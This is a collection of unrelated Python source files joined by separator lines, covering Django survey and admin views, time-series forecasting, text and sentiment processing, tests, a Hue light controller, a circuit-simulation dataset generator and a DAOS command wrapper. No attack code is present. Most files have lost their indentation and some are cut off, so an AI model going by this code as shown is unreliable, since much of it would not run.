"""Add an app"""
debug = logging.getLogger(__name__).debug
group_name = 'a_' + name
if not self.first(name=group_name):
group_id = self.put(
Group(
name=group_name,
type='A',
description='%s application group' % name,
admin_group_id=1,
)
)
debug('created new app group %r (%r)', group_name, group_id)
audit('create app group', group_name)
return group_id
def remove_app(self, name):
"""Remove an app"""
debug = logging.getLogger(__name__).debug
group_name = 'a_' + name
if self.first(name=group_name):
self.delete(name=group_name)
audit('delete app group', name)
debug('deleted app group %r', group_name)
def get_group_admin_group_ids(self):
"""Return a set of group administrator group group_ids"""
return set(
group.admin_group_id for group in self.find(type='U')
)
def __str__(self):
return str(
zoom.utils.ItemList(
((
group.group_id,
group.name,
group.type,
group.description,
) for group in self),
labels=('ID', 'Name', 'Type', 'Description')
)
)
class SystemAttachment(Record):
pass
Attachment = SystemAttachment
def handler(request, handler, *rest):
request.site.groups = Groups(request.site.db)
request.site.users = Users(request.site.db)
return handler(request, *rest)
|
import json
import copy
import pyminizip
import uuid
from collections import OrderedDict
import yaml
from django.conf import settings
from django.core.files.storage import default_storage
from django.http import HttpResponse
from django.views import generic
import logging
from django.utils.translation import gettext
from AIST_survey.models.enquete import Enquete
from AIST_survey.models.question import Question
from make_enquete_setting.forms import ImportSettingForm
class IndexView(generic.FormView):
template_name = "make_enquete_setting/index.html"
form_class = ImportSettingForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# Convert the answer-type descriptions into the requested language
type_dict = copy.deepcopy(Question.type_dict)
for key, value in type_dict.items():
value['description'] = gettext(value['description'])
context['question_type'] = json.dumps(type_dict)
context['password_min_length'] = Enquete.PASSWORD_MIN_LENGTH
context['password_max_length'] = Enquete.PASSWORD_MAX_LENGTH
context['title_max_length'] = Enquete._meta.get_field("title").max_length
# Tell the front end whether DEBUG mode is enabled
context['is_debug'] = settings.DEBUG
return context
def post(self, request, *args, **kwargs):
# Register a constructor so YAML mappings are loaded as OrderedDict on import
def construct_odict(loader, node):
return OrderedDict(loader.construct_pairs(node))
logger = logging.getLogger('development')
context = self.get_context_data(**kwargs)
# If a settings file was imported, parse the YAML file and pass it to the template
form = ImportSettingForm(request.POST, request.FILES)
upload_file = request.FILES['file']
if form.is_valid():
file_name = default_storage.save(str(uuid.uuid4()) + ".yaml", upload_file)
with default_storage.open(file_name) as rf:
yaml.add_constructor('tag:yaml.org,2002:map', construct_odict, Loader=yaml.SafeLoader)
setting_data = yaml.safe_load(rf)
context["setting_data"] = json.dumps(setting_data)
logger.debug("import_setting : " + str(setting_data))
default_storage.delete(file_name)
else:
context["form_data"] = form
context["import_error"] = 'インポートしようとしたファイルの形式が不正です。'
return self.render_to_response(context)
class ExportSettingView(generic.View):
@staticmethod
def post(request):
# Function that tells yaml.dump how to represent an OrderedDict
def represent_odict(dumper, instance):
return dumper.represent_mapping('tag:yaml.org,2002:map', instance.items())
# Collect the questionnaire settings from the submitted form
logger = logging.getLogger('development')
hashed_enquete_password = Enquete.hash_password(request.POST["enquete_password"])
dic = OrderedDict(enquete_title=request.POST["enquete_title"],
enquete_has_password=request.POST["enquete_has_password"],
enquete_password=hashed_enquete_password,
enquete_published_at=request.POST["enquete_published_at"],
enquete_expired_at=request.POST["enquete_expired_at"],
# enquete_finished_at=request.POST["enquete_finished_at"],
enquete_term_of_service=request.POST["term_of_service"],
question_list=[])
# Collect the list of questions
question_text_list = request.POST.getlist("question_text")
question_type_list = request.POST.getlist("question_type")
question_is_skip_allowed_list = request.POST.getlist("question_is_skip_allowed")
question_min_like_required_list = request.POST.getlist("question_min_like_required")
question_example_answer_list = request.POST.getlist("question_example_answer")
question_with_answered_num = request.POST.getlist("question_with_answered_num")
question_without_select = request.POST.getlist("question_without_select")
question_is_result_public = request.POST.getlist("question_is_result_public")
for index, question_text in enumerate(question_text_list):
tmp_dic = OrderedDict(question_text=question_text,
question_type=question_type_list[index],
question_is_skip_allowed=question_is_skip_allowed_list[index],
question_min_like_required=question_min_like_required_list[index],
question_example_answer=question_example_answer_list[index],
question_with_answered_num=question_with_answered_num[index],
question_without_select=question_without_select[index],
question_is_result_public=question_is_result_public[index],
choice_list=request.POST.getlist("choice_text_" + str(index)))
dic['question_list'].append(tmp_dic)
logger.debug("export_setting_data : " + str(dic))
# Specify the output format used when dumping an OrderedDict
# Reference: https://qiita.com/podhmo/items/aa954ee1dc1747252436#jsonと互換性をもたせた表現で出力するようにするdictの数値のkeyを文字列にする
yaml.add_representer(OrderedDict, represent_odict)
setting_yaml = yaml.dump(dic, default_flow_style=False, allow_unicode=True, encoding="utf-8").decode('utf-8')
yaml_path = 'export_setting/' + 'enquete_setting_' + str(uuid.uuid4().hex) + '.yaml'
# Save the YAML settings file as a temporary file
with default_storage.open(yaml_path, 'w') as f:
f.write(setting_yaml)
# Save a zip archive of the YAML file as another temporary file
zip_path = 'export_setting/' + str(uuid.uuid4()) + '.zip'
pyminizip.compress(default_storage.path(yaml_path), '/', default_storage.path(zip_path),
request.POST["zip_password"], 0)
# Build a bytes object from the zip file
string_io = default_storage.open(zip_path, 'rb')
# Remove the temporary files
default_storage.delete(yaml_path)
default_storage.delete(zip_path)
response = HttpResponse(string_io, content_type='application/zip')
response['Content-Disposition'] = 'attachment; filename="enquete_setting.zip"'
return response
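# Illustrative shape of the exported YAML (key names mirror the OrderedDict built
# above; the values shown here are placeholders):
#   enquete_title: Example survey
#   enquete_has_password: 'true'
#   enquete_password: <hashed password>
#   ...
#   question_list:
#   - question_text: <question text>
#     choice_list: [<choice 1>, <choice 2>]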
|
from django.contrib import admin
from .models import Producto
from clases_abstracta.admin import AbstractaAdmin
from import_export import resources
class ProductoResource(resources.ModelResource):
class Meta:
model = Producto
class ProductoAdmin(AbstractaAdmin):
search_fields = ('nombre', 'marca', 'id_categoria')
list_display = ('nombre', 'marca', 'id_categoria', 'estado', 'stock', 'fecha_actualizacion')
list_editable = ('stock',)
resource_class = ProductoResource
def save_model(self, request, obj, form, change) -> None:
    # Keep the estado flag in sync with the stock level; super().save_model()
    # persists the object, so no extra save() calls are needed here.
    obj.estado = obj.stock != 0
    return super().save_model(request, obj, form, change)
admin.site.register(Producto, ProductoAdmin)
|
import statsmodels.api as sm
import numpy
class SARIMAX(object):
def __init__(self, order=(0,0,2), season=(1,1,2,24), look_back=72):
self.__order = order
self.__season = season
self.__look_back = look_back
def __create_sarimax_dataset(self, dataset):
x = []
for i in range(len(dataset)-self.__look_back-1):
x.append(dataset[i:i+self.__look_back])
return x
def predict(self, data):
data = self.__create_sarimax_dataset(data)
result = []
for d in data:
model = sm.tsa.statespace.SARIMAX(
d,
order = self.__order,
seasonal_order = self.__season,
enforce_stationarity = False,
enforce_invertibility = False
)
fit = model.fit(disp=0)
result.append(fit.forecast()[0])
return result
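# Illustrative usage sketch (the hourly series is an assumption, not part of this module):
#   model = SARIMAX(order=(0, 0, 2), season=(1, 1, 2, 24), look_back=72)
#   forecasts = model.predict(hourly_values)  # one one-step-ahead forecast per 72-sample window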
|
from __future__ import print_function
from __future__ import absolute_import, division
import random, re, datetime, time, pprint, sys, math, traceback
from contextlib import contextmanager
from base import *
@setting #########################################
def LIB(): return o(
seed = 1,
has = o(decs = 3,
skip="_",
wicked=True),
show = o(indent=2,
width=50)
) ################################################
"""
Unit test engine, inspired by Kent Beck.
"""
def ok(*lst):
for one in lst: unittest(one)
return one
class unittest:
tries = fails = 0 # tracks the record so far
@staticmethod
def score():
t = unittest.tries
f = unittest.fails
return "# TRIES= %s FAIL= %s %%PASS = %s%%" % (
t,f,int(round(t*100/(t+f+0.001))))
def __init__(i,test):
unittest.tries += 1
try:
test()
except Exception as e:
unittest.fails += 1
i.report(e,test)
def report(i,e,test):
print(traceback.format_exc())
print(unittest.score(),':',test.__name__, e)
#-------------------------------------------------
now = datetime.datetime.now
r = random.random
any = random.choice
isa = isinstance
sqrt = math.sqrt
log = math.log
e = math.e
pi= math.pi
sin = math.sin
fun = lambda x: x.__class__.__name__ == 'function'
milli_time = lambda: int(round(time.time() * 1000))
def rseed(seed):
if seed is not None: random.seed(seed)
def lt(x,y): return x < y
def gt(x,y): return x > y
def first(lst): return lst[0]
def last(lst): return lst[-1]
def mean(lst): return sum(lst)/len(lst)
def within(lo,hi): return lo + (hi - lo)*r()
def wrap(x,lo,hi):
return x if x==hi else lo + (x - lo) % (hi - lo)
def shuffle(lst):
random.shuffle(lst)
return lst
def ntiles(lst, tiles=[0.1,0.3,0.5,0.7,0.9],
norm=False, f=3,ordered=True):
def pos(x):
return len(lst) - 1 if x == 1 else int(len(lst)*x)
assert len(lst) > len(tiles),"list too small"
if not ordered:
lst = sorted(lst)
if norm:
lo,hi = lst[0], lst[-1]
lst= [(x - lo)/(hi-lo+0.0001) for x in lst]
at = lambda x: lst[ pos(x) ]
return g([ at(tile) for tile in tiles ],f)
def say(*lst):
sys.stdout.write(', '.join(map(str,lst)))
sys.stdout.flush()
def g(lst,f=3):
return map(lambda x: round(x,f),lst)
def items(x):
if isinstance(x,(list,tuple)):
for y in x:
for z in items(y):
yield z
else:
yield x
def printm(matrix):
s = [[str(e) for e in row] for row in matrix]
lens = [max(map(len, col)) for col in zip(*s)]
fmt = ' | '.join('{{:{}}}'.format(x) for x in lens)
for row in [fmt.format(*row) for row in s]:
print(row)
def ditto(m,mark="."):
def worker(lst):
out = []
for i,now in enumerate(lst):
before = old.get(i,None) # get the old value, if it exists
out += [mark if before == now else now]
old[i] = now # next time, 'now' is the 'old' value
return out # the lst with ditto marks inserted
old = {}
return [worker(row) for row in m]
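# For example, ditto([[1, 2, 3], [1, 2, 4]]) returns [[1, 2, 3], ['.', '.', 4]]:
# repeated column values are replaced by the mark so tables are easier to scan.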
#-------------------------------------------------
def cache(f):
name = f.__name__
def wrapper(i):
i._cache = i._cache or {}
key = (name, i.id)
if key in i._cache:
x = i._cache[key]
else:
x = f(i) # cache miss: call the wrapped function
i._cache[key] = x # and remember the result for next time
return x
return wrapper
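# Illustrative use of @cache (assumes the class defines an 'id' attribute and a
# '_cache' slot initialised to None, as the wrapper expects; 'expensive' is a placeholder):
#   class Model(object):
#     id, _cache = 0, None
#     @cache
#     def score(i): return expensive(i)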
@contextmanager
def duration():
t1 = time.time()
yield
t2 = time.time()
print("\n" + "-" * 72)
print("# Runtime: %.3f secs" % (t2-t1))
def use(x,**y): return (x,y)
@contextmanager
def settings(*usings):
for (using, override) in usings:
using(**override)
yield
for (using,_) in usings:
using()
@contextmanager
def study(what,*usings):
print("\n#" + "-" * 50,
"\n#", what, "\n#",
datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S"))
for (using, override) in usings:
using(**override)
rseed(the.LIB.seed)
show(the)
with duration():
yield
for (using,_) in usings:
using()
|
import pycurl
try:
from urllib.parse import urlencode
except:
from urllib import urlencode
try:
from BytesIO import BytesIO
except ImportError:
from io import BytesIO
import json
import re
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from gensim import corpora, models
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
from exception import *
import nltk
nltk.download('wordnet')
TOPICS = 2
NUM_WORDS = 10
def CurlRequest(data, url = 'http://text-processing.com/api/sentiment/'):
c = pycurl.Curl()
buf = BytesIO()
c.setopt(pycurl.URL, url)
c.setopt(pycurl.WRITEFUNCTION,buf.write)
post_data = {'text':data}
post_field = urlencode(post_data)
c.setopt(c.POSTFIELDS,post_field)
c.perform()
c.close()
res = buf.getvalue().decode('UTF-8')
if res != None and res != "":
d = json.loads(res)
if 'label' in d:
return d['label']
else:
return None
else:
return None
def SentimentAnalysis(data, url = 'http://text-processing.com/api/sentiment/'):
c = pycurl.Curl()
buf = BytesIO()
c.setopt(pycurl.URL, url)
c.setopt(pycurl.WRITEFUNCTION,buf.write)
post_data = {'text':data}
post_field = urlencode(post_data)
c.setopt(c.POSTFIELDS,post_field)
c.perform()
c.close()
res = buf.getvalue().decode('UTF-8')
if res != None and res != "":
try:
d = json.loads(res)
if 'label' in d:
return [d['label'], d['probability'][d['label']]]
except Exception as e:
pass
else:
return None
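# Illustrative calls (both hit the default text-processing.com endpoint, so network access is assumed):
#   label = CurlRequest("great service, would recommend")                 # e.g. 'pos'
#   label_and_prob = SentimentAnalysis("great service, would recommend")  # e.g. ['pos', 0.83]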
class TextProcess:
def __init__(self):
self.__stemmer = SnowballStemmer(language = 'english')
def lemmatizeText(self,text):
return self.__stemmer.stem(WordNetLemmatizer().lemmatize(text))
def preprocess(self,text):
result = []
# preprocess the tweets, i.e., remove links, RT markers, and usernames
text = re.sub(r'@\w+','',text)
text = re.sub(r'http:\/\/\w+(\.\w+)*','',text)
#print(text)
for token in simple_preprocess(text):
if token not in STOPWORDS and len(token)>3:
result.append(self.lemmatizeText(token))
return result
def deleteAt(self,text):
text = re.sub(r'@\w+','',text)
return text
def deleteHttp(self,text):
text = re.sub(r'http\S+','',text)
return text
def findTopics(self,text):
tokens = self.preprocess(text)
if not isinstance(tokens, list):
raise TeleException(Type.WrongTypeException,'tokens should be list')
dictionary = corpora.Dictionary([tokens])
corpus = [dictionary.doc2bow(tokens)]
lda_model = models.ldamodel.LdaModel(corpus, num_topics = TOPICS, id2word = dictionary, passes = 20)
return lda_model.print_topics(num_topics = TOPICS, num_words = NUM_WORDS)
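# Illustrative sketch (the tweet text is an assumption; topics come back in
# gensim's print_topics format):
#   tp = TextProcess()
#   tokens = tp.preprocess("RT @user loving the new model http://example.com")
#   topics = tp.findTopics("loving the new model, the model keeps improving")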
|
"""
Unit tests for `calculator` module.
"""
import pytest
from homework_1.sample_project.calculator.calc import check_power_of_2
@pytest.mark.parametrize(
["value", "expected_result"],
[
pytest.param(
-1,
False,
id="False case: -1 is not a power of 2.",
),
pytest.param(
0,
False,
id="False case: 0 is not a power of 2.",
),
pytest.param(
1,
True,
id="True case: 2**0 = 1.",
),
pytest.param(
2,
True,
id="True case: 2**1 = 2.",
),
pytest.param(
12,
False,
id="False case: 12 is not a power of 2.",
),
pytest.param(
65536,
True,
id="True case: 2**16 = 65536.",
),
pytest.param(
2 ** 29,
True,
id="True case: 2**29.",
),
pytest.param(
2 ** (49 - 1),
True,
id="True case: 2**(49-1).",
),
pytest.param(
2 ** (53 + 1),
True,
id="True case: 2**(53+1).",
),
],
)
def test_power_of_2(value: int, expected_result: bool):
"""
Passes test if `check_power_of_2`(`value`)
is equal to `expected_result`.
"""
assert check_power_of_2(value) == expected_result
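# For reference, a minimal implementation consistent with all of the cases above
# (the real check_power_of_2 in calculator.calc may differ) is:
#   def check_power_of_2(value: int) -> bool:
#       return value > 0 and value & (value - 1) == 0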
|
import asyncio
from motor.motor_asyncio import AsyncIOMotorClient
from common.config import config
motor = AsyncIOMotorClient(
"mongodb://{username}:{password}@{host}:{port}/{database}".format(
**config["database"]
)
)
db = motor[config["database"]["database"]]
async def setup_collections():
await db.image.create_index("created_at")
await db.image.create_index("channel")
await db.image.create_index("attachment_id")
await db.image.create_index("deleted")
await db.channel.create_index("alias")
if __name__ == "__main__":
print("Setting up indexes for database")
loop = asyncio.get_event_loop()
loop.run_until_complete(setup_collections())
print("done!")
|
"""Compare results with those from SLALIB.
Use this interactively in IPython. Then copy files to pytpm/tests/data
so that automated tests can be performed.
"""
import math
from pyslalib import slalib
from read_data import get_ndwfs
tab = get_ndwfs()
# sla_fk54z.
# Convert FK5 J2000 coordinates, with zero-proper motion in the
# inertial FK5 frame to FK4 B1950.0 frame. These will have non-zero
# proper motion in the FK4 frame.
#raj2_rad = (math.radians(i) for i in tab['raj2'])
#decj2_rad = (math.radians(i) for i in tab['decj2'])
#
#rab1 = []
#decb1 = []
#pmab1 = []
#pmdb1 = []
#
#for r,d in zip(raj2_rad, decj2_rad):
# x,y,p,m = slalib.sla_fk54z(r, d, 1950.0)
# rab1.append(math.degrees(x))
# decb1.append(math.degrees(y))
# # rad/trp. year to milli-arcsec per trp. year. NOT pma*cos(d).
# pmab1.append(math.degrees(p)*3600.0*1e3)
# # Milli-arcsec per trp. year.
# pmdb1.append(math.degrees(m)*3600.0*1e3)
#
#with open("slalib_ndwfs_fk54z.txt","w") as f:
# for r,d,p,m in zip(rab1, decb1, pmab1, pmdb1):
# # The formats are all very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec. pm is in milli-arsec per year.
# s = "%14.9f %14.9f %10.4f %10.4f\n" # 10.4 is very generous.
# f.write(s % (r, d, p, m))
# sla_fk45z.
# Convert FK4 B1950.0 coordinates to FK5 J2000 coordinates, assuming
# that they have zero proper motion in the latter. This requires
# correcting for the apparent proper motion induced by the rotating FK4
# frame and hence the epoch is needed.
#rab1_rad = (math.radians(i) for i in tab['rab1'])
#decb1_rad = (math.radians(i) for i in tab['decb1'])
#
#raj2 = []
#decj2 = []
#for r,d in zip(rab1_rad, decb1_rad):
# x,y = slalib.sla_fk45z(r, d, 1950.0)
# raj2.append(math.degrees(x))
# decj2.append(math.degrees(y))
#
#with open("slalib_ndwfs_fk45z.txt","w") as f:
# for r,d in zip(raj2, decj2):
# # The formats are all very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec.
# s = "%14.9f %14.9f\n"
# f.write(s % (r, d))
# sla_eqecl.
# Convert J2000.0 FK5 equatorial coordinates to IAU 1980 ecliptic
# coordinates at J2000.0
#raj2 = (math.radians(i) for i in tab['raj2'])
#decj2 = (math.radians(i) for i in tab['decj2'])
#
#ecl_lon = []
#ecl_lat = []
#
#for r, d in zip(raj2, decj2):
# x, y = slalib.sla_eqecl(r, d, 51544.5)
# ecl_lon.append(math.degrees(x))
# ecl_lat.append(math.degrees(y))
#
#with open("slalib_ndwfs_eqecl.txt", "w") as f:
# for i, j in zip(ecl_lon, ecl_lat):
# # The format is very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec.
# s = "%14.9f %14.9f \n"
# f.write(s % (i, j))
# sla_ecleq.
# Convert IAU 1980 J2000 ecliptic coordinates to FK5 J2000 equatorial
# coordinates.
#ecl_lon = (math.radians(i) for i in tab['elon2'])
#ecl_lat = (math.radians(i) for i in tab['elat2'])
#
#raj2 = []
#decj2 = []
#
#for r, d in zip(ecl_lon, ecl_lat):
# x, y = slalib.sla_ecleq(r, d, 51544.5)
# raj2.append(math.degrees(x))
# decj2.append(math.degrees(y))
#
#with open("slalib_ndwfs_ecleq.txt", "w") as f:
# for i, j in zip(raj2, decj2):
# # The format is very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec.
# s = "%14.9f %14.9f \n"
# f.write(s % (i, j))
# sla_eqgal.
# Convert FK5 J2000.0 equatorial coordinates to galactic.
#raj2 = (math.radians(i) for i in tab['raj2'])
#decj2 = (math.radians(i) for i in tab['decj2'])
#
#gal_lon = []
#gal_lat = []
#
#for r, d in zip(raj2, decj2):
# x, y = slalib.sla_eqgal(r, d)
# gal_lon.append(math.degrees(x))
# gal_lat.append(math.degrees(y))
#
#with open("slalib_ndwfs_eqgal.txt", "w") as f:
# for l, b in zip(gal_lon, gal_lat):
# # The format is very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec.
# s = "%14.9f %14.9f \n"
# f.write(s % (l, b))
#sla_galeq.
# Convert galactic coordinates to FK5 J2000 coordinates.
#gal_lon = (math.radians(i) for i in tab['glon'])
#gal_lat = (math.radians(i) for i in tab['glat'])
#
#raj2 = []
#decj2 = []
#
#for l, b in zip(gal_lon, gal_lat):
# x, y = slalib.sla_galeq(l, b)
# raj2.append(math.degrees(x))
# decj2.append(math.degrees(y))
#
#with open("slalib_ndwfs_galeq.txt", "w") as f:
# for r, d in zip(raj2, decj2):
# # The format is very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec.
# s = "%14.9f %14.9f \n"
# f.write(s % (r, d))
|
from __future__ import annotations
import os
from phue import Bridge, PhueRegistrationException
from .controller import LightController, LightInfo
NAME = "hue"
class HueLightController(LightController):
def __init__(self, bridge_ip: str):
self.bridge = self.initialize_hue_bridge(bridge_ip)
def change_light_state(self, color_mode: str, on: bool = True, **kwargs):
kwargs["on"] = on
self.bridge.set_light(self.light_id, kwargs)
def get_light_info(self) -> LightInfo:
light = self.bridge.get_light(self.light_id)
lightinfo = LightInfo(
model_id=light["modelid"],
)
if "ct" in light["capabilities"]["control"]:
lightinfo.min_mired = light["capabilities"]["control"]["ct"]["min"]
lightinfo.max_mired = light["capabilities"]["control"]["ct"]["max"]
return lightinfo
def initialize_hue_bridge(self, bridge_ip: str) -> Bridge:
config_file_path = os.path.join(os.path.dirname(__file__), "../.persistent/.python_hue")
try:
bridge = Bridge(ip=bridge_ip, config_file_path=config_file_path)
except PhueRegistrationException as err:
print("Please click the link button on the bridge, than hit enter..")
input()
bridge = Bridge(ip=bridge_ip, config_file_path=config_file_path)
return bridge
def get_questions(self) -> list[dict]:
light_list = []
for light in self.bridge.lights:
light_list.append(
{"key": light.light_id, "value": light.light_id, "name": light.name}
)
return [
{
"type": "list",
"name": "light",
"message": "Select the light?",
"choices": light_list,
},
]
def process_answers(self, answers):
self.light_id = answers["light"]
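# Minimal usage sketch (the bridge IP and light id below are placeholders):
#   controller = HueLightController("192.168.1.2")
#   controller.process_answers({"light": 1})
#   controller.change_light_state("ct", on=True, bri=254)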
|
from rest_framework import permissions
from guardian.shortcuts import get_user_perms
### Project Spendings permissions
class hasAddProjectBudgetSpendingsPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
permissions = get_user_perms(request.user, obj)
return 'add_project_spendings' in permissions
class hasChangeProjectBudgetSpendingsPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
project = obj.project
permissions = get_user_perms(request.user, project)
return 'change_project_spendings' in permissions
class hasDeleteProjectBudgetSpendingsPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
project = obj.project
permissions = get_user_perms(request.user, project)
return 'delete_project_spendings' in permissions
class hasViewProjectBudgetSpendingsPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
project = obj.project
permissions = get_user_perms(request.user, project)
return 'view_project_spendings' in permissions
|
from distutils.core import setup
import py2exe
setup(console=['dialer.py'])
"""
may need to download the VC redistributable
https://www.microsoft.com/en-us/download/details.aspx?id=29
tutorial:
http://www.py2exe.org/index.cgi/Tutorial
"""
|
"""
With a given data_sets.ini configuration listing the name of a dataset by HighVoltage-LowVoltage,
creates the expected dataset to be run upon by main.py
Data is collected from a local "Spice Simulation" directory relative to the python script and
produced in a Simulation_Sets folder to be run upon.
"""
import os
import configparser
# Makes datasets based on the data_sets.ini file
# Needed params: Full Voltage, Shade Voltage as well as Dataset name. (Just append to given list)
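# Illustrative data_sets.ini layout (section names are "<HighVoltage>-<LowVoltage>";
# temps may mix single values and inclusive ranges, or be left empty to use the
# default temperature list below -- the concrete numbers here are placeholders):
# [1000-900]
# temps = 27, 30-35, 50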
if __name__ == '__main__':
# Run this script right next to Spice Simulation folder
path = os.path.abspath('Spice Simulation/')
# Read in datasets to make
config = configparser.ConfigParser()
config.read('data_sets.ini')
data_sets = [[key, config[key]['temps']] for key in config.keys() if key != 'DEFAULT']
# print(data_sets)
to_run_sets = []
for set, temps in data_sets:
# Step 1: Collect Temperatures to Run
if not temps:
temp_sets = [27, 30, 35, 40, 45, 50]
print(set, temp_sets)
else:
var_sets = temps.split(', ')
temp_sets = []
for val in var_sets:
if '-' in val:
lower, upper = val.split('-')
results = [x for x in range(int(lower), int(upper) + 1)]
else:
results = [int(val)]
temp_sets += results
print(set, temp_sets)
to_run_sets.append((set, temp_sets))
# Only check these folders for data
folders_to_check = ['1x10', '2x4', '2x5', '3x3', '4x2', '5x2', '10x1']
for dir in os.scandir(path):
if dir.is_dir() and dir.name in folders_to_check:
print(f'Main Directory: {dir.name}')
# Highly inefficient but lazy method
for file in os.scandir(dir.path):
if file.is_file() and file.name.endswith('cir'):
print(f'Creating Dataset from {file.name}')
for set, temps in to_run_sets:
for temperatures in temps:
full_path = os.path.abspath(
f"Simulation_Sets\\{set}\\Temp{temperatures}\\{dir.name}\\")
os.makedirs(full_path, exist_ok=True)
high, low = set.split('-') # Get high and low voltages expected
with open(file.path, 'r') as f:
ltspice_file = f.read()
# Update the necessary data (Temperature, High voltage, Low Voltage)
ltspice_file = ltspice_file.replace('temp=30', f'temp={temperatures}')
ltspice_file = ltspice_file.replace('900', low)
ltspice_file = ltspice_file.replace('1000', high)
with open(full_path + '\\' + file.name, 'w') as f:
f.write(ltspice_file) # write out the file to correct pathing
elif file.is_file() and file.name == 'cell_2.lib':
for set, temps in to_run_sets:
for temperatures in temps:
full_path = os.path.abspath(
f"Simulation_Sets\\{set}\\Temp{temperatures}\\{dir.name}\\")
with open(file.path, 'r') as file_r, open(full_path + '\\' + file.name, 'w') as f:
f.write(file_r.read()) # write out the file to correct pathing
|
#!/usr/bin/python
"""
(C) Copyright 2018-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import re
import traceback
from daos_utils_base import DaosCommandBase
class DaosCommand(DaosCommandBase):
# pylint: disable=too-many-ancestors,too-many-public-methods
"""Defines a object representing a daos command."""
METHOD_REGEX = {
"run": r"(.*)",
"container_create": r"container ([0-9a-f-]+)",
"container_query":
r"Pool UUID:\s+([0-9a-f-]+)\n" +
r"Container UUID:\s+([0-9a-f-]+)\n" +
r"Number of snapshots:\s+(\d+)\n" +
r"Latest Persistent Snapshot:\s+(\d+)\n" +
r"Highest Aggregated Epoch:\s+(\d+)",
}
def pool_query(self, pool, sys_name=None, sys=None):
"""Query a pool.
Args:
pool (str): pool UUID
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
sys (str, optional): [description]. Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos pool query command fails.
"""
return self._get_json_result(
("pool", "query"), pool=pool, sys_name=sys_name, sys=sys)
def pool_autotest(self, pool):
"""Runs autotest for pool
Args:
pool (str): pool UUID
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos pool autotest command fails.
"""
return self._get_result(
("pool", "autotest"), pool=pool)
def container_create(self, pool, sys_name=None, cont=None,
path=None, cont_type=None, oclass=None,
chunk_size=None, properties=None, acl_file=None):
# pylint: disable=too-many-arguments
"""Create a container.
Args:
pool (str): UUID of the pool in which to create the container
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
cont (str, optional): container UUID. Defaults to None.
path (str, optional): container namespace path. Defaults to None.
cont_type (str, optional): the type of container to create. Defaults
to None.
oclass (str, optional): object class. Defaults to None.
chunk_size (str, optional): chunk size of files created. Supports
suffixes: K (KB), M (MB), G (GB), T (TB), P (PB), E (EB).
Defaults to None.
properties (str, optional): String of comma-separated <name>:<value>
pairs defining the container properties. Defaults to None
acl_file (str, optional): ACL file. Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container create command fails.
"""
return self._get_result(
("container", "create"), pool=pool, sys_name=sys_name,
cont=cont, path=path, type=cont_type, oclass=oclass,
chunk_size=chunk_size, properties=properties, acl_file=acl_file)
def container_clone(self, src, dst):
"""Clone a container to a new container.
Args:
src (str): the source, formatted as daos://<pool>/<cont>
dst (str): the destination, formatted as daos://<pool>/<cont>
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container clone command fails.
"""
return self._get_result(
("container", "clone"), src=src, dst=dst)
def container_destroy(self, pool, cont, force=None, sys_name=None):
"""Destroy a container.
Args:
pool (str): UUID of the pool in which to create the container
cont (str): container UUID.
force (bool, optional): Force the container destroy. Defaults to
None.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container destroy command fails.
"""
return self._get_result(
("container", "destroy"), pool=pool, sys_name=sys_name,
cont=cont, force=force)
def container_check(self, pool, cont, sys_name=None, path=None):
"""Check the integrity of container objects.
Args:
pool (str): UUID of the pool in which to create the container
cont (str): container UUID.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
path (str): Container namespace path. Defaults to None
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container check command fails.
"""
return self._get_result(
("container", "check"), pool=pool, cont=cont,
sys_name=sys_name, path=path)
def container_get_acl(self, pool, cont,
verbose=False, outfile=None):
"""Get the ACL for a given container.
Args:
pool (str): Pool UUID
cont (str): Container for which to get the ACL.
verbose (bool, optional): Verbose mode.
outfile (str, optional): Write ACL to file.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container get-acl command fails.
"""
return self._get_result(
("container", "get-acl"), pool=pool, cont=cont,
verbose=verbose, outfile=outfile)
def container_delete_acl(self, pool, cont, principal):
"""Delete an entry for a given principal in an existing container ACL.
Args:
pool (str): Pool UUID
cont (str): Container from which to delete the ACL entry.
principal (str): principal portion of the ACL.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container delete-acl command fails.
"""
return self._get_result(
("container", "delete-acl"), pool=pool, cont=cont,
principal=principal)
def container_overwrite_acl(self, pool, cont, acl_file):
"""Overwrite the ACL for a given container.
Args:
pool (str): Pool UUID
cont (str): Container for which to overwrite the ACL.
acl_file (str): input file containing ACL
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container overwrite-acl command fails.
"""
return self._get_result(
("container", "overwrite-acl"), pool=pool, cont=cont,
acl_file=acl_file)
def container_update_acl(self, pool, cont, entry=None, acl_file=None):
"""Add or update the ACL entries for a given container.
Args:
pool (str): Pool UUID
cont (str): Container for which to update the ACL.
entry (bool, optional): Add or modify a single ACL entry
acl_file (str, optional): Input file containing ACL
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
